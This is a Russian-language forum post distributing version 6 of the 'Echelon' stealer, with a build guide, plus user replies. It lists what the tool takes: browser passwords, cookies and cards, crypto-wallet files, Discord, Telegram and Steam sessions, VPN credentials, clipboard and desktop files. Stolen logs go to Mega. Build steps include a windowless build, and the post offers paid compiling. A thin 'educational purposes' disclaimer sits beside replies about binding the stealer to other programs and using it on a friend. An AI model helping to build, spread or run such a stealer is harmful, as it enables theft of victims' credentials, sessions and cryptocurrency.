Решил залить сюда 6 версию Echelon и написал к нему гайд, ибо видел только v5. Автор этой версии Ambal. Что нового: -Исправлен первый алгоритм стилла паролей с браузеров на Chromium движке, когда вместо паролей были пустые пробелы. Теперь все работает исправно. -Профиль Release теперь по умолчанию и исправно работает. Debug - не работает. -Небольшая оптимизация веса. После сборки файл будет в папке OUTPUT в корне проекта. Возможности Функционал Браузеры: Все браузеры на основе Chromium включая 80ю версию Все браузеры на основе Gecko(Mozilla) включая x32 и x64 версии Старые версии Edge и ie Сбор рекурсивный всех данных Пароли, История, Авто-заполнение, Cookies, Cards ******* криптокошельков - сессий и .dat файлов: Armory Wallet, Atomic Wallet, Bitcoin Core, Bytecoin, Dash Core, Electrum, Ethereum, Exodus, Jaxx, Litecoin Core, Monero Wallet, Zcash ******* сессий: Discord, Telegram ,Steam FileZilla, Total Commander Psi+, Pidgin Прочее: Nord*** - Логины и пароли авторизации Open*** - Конфиги и ключи .o*** / так же сканирует папку юзера. Proton*** - Сессии Mozilla Thunderbird - Логины и пароли Текстовые данные в буфере обмена Скриншет экрана во время выполнения Системная информация, установленные программы, процессы, инфа о железе. Граббер файлов: Можно ограничить вес каждого файла что бы не превышал к примеру 5мб. Можно указать свои расширения для граббинга По умолчанию собирает файлы с расширениями: ".txt", ".doc", ".cs", ".json", ".suo", ".sql" Рабочий стол и все подпапки, названия папок и их вложенность сохраняется как есть. Информация о системе: Версия OS: Имя ПК Utc CPU, RAM, GPU IP Geolocation Установленные программы Запущенные процессы Отправка лога осуществляется на: Mega Установка и настройка 1. Устанавливаем Visual Studio, если еще не установлена. 2. Качаем проект и открываем Echelon.sln 3. Переходим к Program.cs 4. Настраиваем, не забывая ввести данные от mega.nz 5. Запускаем сборку обязательно на конфигурации Release! Для первого запуска проект нужно собрать как "Консольное приложение", чтобы убедиться в работоспособности. Если все норм - собираем как "Приложение Windows". 6. Собранный файл, уже скомпилированный будет лежать в папке OUTPUT в корне проекта. Если вы новокек, который не умеет компилить сурсы, то я могу вам это сделать за 100р Скачать Правила Все способы сбора журналов являются случайными Написан исключительно в образовательных целях! Я не несу ответственности за использование данного проекта и любых его частей кода. Написано исключительно в образовательных целях! Я не несу ответственности за использование этого проекта и любых его частей.
zellun, А как его можно склеить с другой программой. Чтобы при открытие одной программы он автоматический тоже запускался ?
Скинул другу, а где там дискорд токены или л:п хранятся?)_ The post was merged to previous Aug 7, 2020 Скинул другу, а где там дискорд токены или л:п хранятся?)_